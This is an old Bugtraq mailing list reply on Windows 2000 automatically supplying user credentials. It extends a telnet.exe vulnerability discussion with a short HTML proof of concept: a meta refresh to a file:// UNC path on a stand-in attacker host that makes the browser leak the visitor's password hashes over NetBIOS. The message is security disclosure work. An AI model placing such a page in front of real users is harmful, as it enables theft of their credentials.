[16788] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (=?koi8-r?Q?=F2=D1=C7=C9=CE_=ED=C9=)
Fri Sep 15 12:59:46 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Message-Id: <4BE72DE5E4DED21198CE00A0C9CEE49014F6B0@blackstar.extrim.ru>
Date: Fri, 15 Sep 2000 10:59:26 +0600
Reply-To: =?koi8-r?Q?=F2=D1=C7=C9=CE_=ED=C9=C8=C1=C9=CC_=E0=D2=D8=C5=D7=C9=DE?= <ryagin@EXTRIM.RU>
From: =?koi8-r?Q?=F2=D1=C7=C9=CE_=ED=C9=C8=C1=C9=CC_=E0=D2=D8=C5=D7=C9=DE?= <ryagin@EXTRIM.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
The problem is far more general then within single poor configuration defaults in telnet.exe.
The main problem is that Windows automatically supply user credentials in many situations without ever asking for his opinion.
For example, the following html file:
<html><head>
<meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt">
</head>
<body>
You will be hacked within 5 seconds...
</body>
</html>
will automatically connect to evil site thru netbios and supply user password hashes.
Putting malicious site into 'Restricted Zone' doesn't helps.
